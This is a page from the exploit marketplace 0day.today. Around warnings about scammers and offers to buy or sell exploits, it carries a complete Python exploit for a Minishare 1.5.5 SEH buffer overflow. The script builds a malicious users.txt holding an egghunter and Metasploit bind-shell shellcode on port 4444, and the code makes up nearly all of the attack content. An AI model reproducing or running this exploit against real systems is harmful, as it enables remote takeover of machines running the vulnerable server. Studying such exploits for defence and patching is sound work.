0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Minishare 1.5.5 BoF Vulnerability (users.txt) EggHunter
======================================================= Minishare 1.5.5 BoF Vulnerability (users.txt) EggHunter ======================================================= # Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version # Date: 11/19/2010 # Author: 0v3r # Bug Found By: Chris Gabriel # Software Link: http://sourceforge.net/projects/minishare # Version: 1.5.5 # Tested on: Windows XP SP3 EN # CVE: N/A #!/usr/bin/python # Just rewrote the exploit using egghunter to inject a bind shell payload # Bug found by Chris Gabriel credit goes to him # # To exploit just place the users.txt file in the Minishare root directory and run minishare.exe egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x77\x30\x30\x74" # EGG w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") # win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x43" "\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x53\x42\x32\x42\x41\x32\x41" "\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x7a\x49\x4b\x4c\x50" "\x6a\x78\x6b\x72\x6d\x6b\x58\x6b\x49\x79\x6f\x6b\x4f\x49\x6f\x53" "\x50\x4c\x4b\x30\x6c\x56\x44\x46\x44\x6e\x6b\x32\x65\x35\x6c\x4c" "\x4b\x41\x6c\x67\x75\x44\x38\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x64" "\x58\x6c\x4b\x71\x4f\x75\x70\x74\x41\x5a\x4b\x33\x79\x6c\x4b\x70" "\x34\x4e\x6b\x57\x71\x4a\x4e\x56\x51\x6f\x30\x4f\x69\x4c\x6c\x6c" "\x44\x69\x50\x71\x64\x44\x47\x4b\x71\x7a\x6a\x54\x4d\x63\x31\x58" "\x42\x5a\x4b\x4b\x44\x37\x4b\x30\x54\x65\x74\x37\x58\x70\x75\x38" "\x65\x4e\x6b\x53\x6f\x61\x34\x56\x61\x58\x6b\x30\x66\x6e\x6b\x76" "\x6c\x50\x4b\x6c\x4b\x31\x4f\x75\x4c\x73\x31\x4a\x4b\x53\x33\x46" "\x4c\x4e\x6b\x6c\x49\x32\x4c\x77\x54\x55\x4c\x45\x31\x4b\x73\x45" "\x61\x4b\x6b\x55\x34\x4e\x6b\x37\x33\x30\x30\x4e\x6b\x51\x50\x64" "\x4c\x6c\x4b\x52\x50\x45\x4c\x6e\x4d\x4e\x6b\x31\x50\x37\x78\x73" "\x6e\x50\x68\x6c\x4e\x52\x6e\x74\x4e\x48\x6c\x52\x70\x49\x6f\x48" "\x56\x41\x76\x30\x53\x30\x66\x35\x38\x74\x73\x76\x52\x30\x68\x70" "\x77\x70\x73\x37\x42\x71\x4f\x73\x64\x49\x6f\x58\x50\x53\x58\x58" "\x4b\x7a\x4d\x4b\x4c\x75\x6b\x42\x70\x79\x6f\x4e\x36\x73\x6f\x4e" "\x69\x4d\x35\x55\x36\x4e\x61\x6a\x4d\x66\x68\x47\x72\x30\x55\x50" "\x6a\x64\x42\x39\x6f\x48\x50\x33\x58\x6e\x39\x35\x59\x6a\x55\x4c" "\x6d\x73\x67\x4b\x4f\x4b\x66\x76\x33\x62\x73\x66\x33\x70\x53\x53" "\x63\x57\x33\x56\x33\x61\x53\x53\x63\x6b\x4f\x4a\x70\x51\x76\x63" "\x58\x46\x71\x71\x4c\x72\x46\x63\x63\x6c\x49\x6b\x51\x4f\x65\x61" "\x78\x4d\x74\x44\x5a\x32\x50\x59\x57\x51\x47\x6b\x4f\x58\x56\x72" "\x4a\x32\x30\x50\x51\x42\x75\x6b\x4f\x68\x50\x42\x48\x4f\x54\x4e" "\x4d\x44\x6e\x6d\x39\x33\x67\x4b\x4f\x68\x56\x76\x33\x73\x65\x79" "\x6f\x6e\x30\x73\x58\x6b\x55\x33\x79\x4e\x66\x37\x39\x30\x57\x59" "\x6f\x58\x56\x70\x50\x53\x64\x50\x54\x63\x65\x4b\x4f\x4e\x30\x4f" "\x63\x72\x48\x78\x67\x62\x59\x7a\x66\x44\x39\x42\x77\x79\x6f\x48" "\x56\x66\x35\x4b\x4f\x6a\x70\x30\x66\x50\x6a\x50\x64\x70\x66\x50" "\x68\x71\x73\x62\x4d\x6d\x59\x78\x65\x32\x4a\x52\x70\x56\x39\x54" "\x69\x58\x4c\x6f\x79\x68\x67\x51\x7a\x67\x34\x6f\x79\x6d\x32\x36" "\x51\x6f\x30\x78\x73\x4c\x6a\x4b\x4e\x72\x62\x76\x4d\x4b\x4e\x63" "\x72\x44\x6c\x6c\x53\x6c\x4d\x73\x4a\x75\x68\x6e\x4b\x6e\x4b\x6e" "\x4b\x75\x38\x33\x42\x6b\x4e\x48\x33\x45\x46\x59\x6f\x32\x55\x47" "\x34\x4b\x4f\x49\x46\x63\x6b\x41\x47\x61\x42\x70\x51\x71\x41\x72" "\x71\x52\x4a\x36\x61\x70\x51\x30\x51\x33\x65\x70\x51\x6b\x4f\x4e" "\x30\x51\x78\x6c\x6d\x5a\x79\x57\x75\x78\x4e\x53\x63\x49\x6f\x6a" "\x76\x63\x5a\x49\x6f\x6b\x4f\x56\x57\x6b\x4f\x5a\x70\x6e\x6b\x42" "\x77\x6b\x4c\x4b\x33\x6b\x74\x73\x54\x4b\x4f\x6e\x36\x36\x32\x6b" "\x4f\x68\x50\x35\x38\x31\x6e\x4b\x68\x5a\x42\x44\x33\x72\x73\x6b" "\x4f\x4e\x36\x4b\x4f\x7a\x70\x43") nops = "\x90" * (386 - len(egghunter)) morenops = "\x90" * 32 # need enough NOPs to overwrite the first instance of the egg seh = "\xE7\x13\x40\x00" # POP POP RET nseh = "\xeb\xc0\x90\x90" # short jump 64 bytes egg = "w00tw00t" # the key the egghunter looks for buff = nops + egghunter + nseh + seh + morenops + egg + shellcode #[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode] try: f = open("users.txt",'w') f.write(buff) f.close() print "\n" print "\t---------------------------------------------------------------------------------" print "\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |" print "\t---------------------------------------------------------------------------------" print "\n" print "\t- File 'users.txt' created..." print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n" except: print "\t-Oooops! Can't write file 'users.txt'...\n" # 0day.today [2024-12-25] #